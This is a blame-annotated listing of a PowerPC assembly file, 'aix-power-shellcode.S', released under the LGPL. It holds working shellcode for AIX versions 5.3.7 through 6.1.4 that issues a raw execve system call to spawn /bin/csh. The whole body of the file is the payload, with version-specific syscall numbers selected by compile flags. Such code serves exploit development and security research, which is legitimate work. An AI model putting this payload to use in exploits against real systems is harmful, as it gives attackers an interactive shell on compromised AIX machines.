2008-10-10 20:23:18 +02:00
|
|
|
/*
|
2010-05-23 22:01:11 +02:00
|
|
|
* aix-power-shellcode.S
|
2008-10-10 20:23:18 +02:00
|
|
|
* Copyright 2008 Ramon de Carvalho Valle <ramon@risesecurity.org>
|
|
|
|
*
|
|
|
|
* This library is free software; you can redistribute it and/or
|
|
|
|
* modify it under the terms of the GNU Lesser General Public
|
|
|
|
* License as published by the Free Software Foundation; either
|
|
|
|
* version 2.1 of the License, or (at your option) any later version.
|
|
|
|
*
|
|
|
|
* This library is distributed in the hope that it will be useful,
|
|
|
|
* but WITHOUT ANY WARRANTY; without even the implied warranty of
|
|
|
|
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
|
|
|
|
* Lesser General Public License for more details.
|
|
|
|
*
|
|
|
|
* You should have received a copy of the GNU Lesser General Public
|
|
|
|
* License along with this library; if not, write to the Free Software
|
|
|
|
* Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
|
|
|
|
*
|
|
|
|
*/
|
|
|
|
|
|
|
|
/*
|
2010-05-23 22:01:11 +02:00
|
|
|
* Supported AIX versions:
|
2008-10-10 20:23:18 +02:00
|
|
|
*
|
2010-05-23 22:01:11 +02:00
|
|
|
* -DAIX614 AIX Version 6.1.4
|
|
|
|
* -DAIX613 AIX Version 6.1.3
|
|
|
|
* -DAIX612 AIX Version 6.1.2
|
|
|
|
* -DAIX611 AIX Version 6.1.1
|
|
|
|
* -DAIX5310 AIX Version 5.3.10
|
|
|
|
* -DAIX539 AIX Version 5.3.9
|
|
|
|
* -DAIX538 AIX Version 5.3.8
|
|
|
|
* -DAIX537 AIX Version 5.3.7
|
2008-10-10 20:23:18 +02:00
|
|
|
*
|
|
|
|
*/
|
|
|
|
|
|
|
|
#include "aix-power.h"
|
|
|
|
|
|
|
|
.globl .main
|
|
|
|
.csect .text[PR]
|
|
|
|
|
|
|
|
.main:
|
|
|
|
|
|
|
|
shellcode:
|
2010-05-23 22:01:11 +02:00
|
|
|
lil %r29,__CAL
|
2008-10-10 20:23:18 +02:00
|
|
|
xor. %r5,%r5,%r5
|
|
|
|
bnel shellcode
|
|
|
|
mflr %r30
|
|
|
|
cal %r30,511(%r30)
|
2008-11-17 11:34:26 +01:00
|
|
|
cal %r3,-511+40(%r30)
|
|
|
|
stb %r5,-511+48(%r30)
|
2008-10-10 20:23:18 +02:00
|
|
|
stu %r5,-4(%r1)
|
|
|
|
stu %r3,-4(%r1)
|
|
|
|
mr %r4,%r1
|
2010-05-23 22:01:11 +02:00
|
|
|
cal %r2,__NC_execve(%r29)
|
2008-10-10 20:23:18 +02:00
|
|
|
crorc %cr6,%cr6,%cr6
|
|
|
|
.long 0x44ffff02
|
|
|
|
.asciz "/bin/csh"
|
|
|
|
|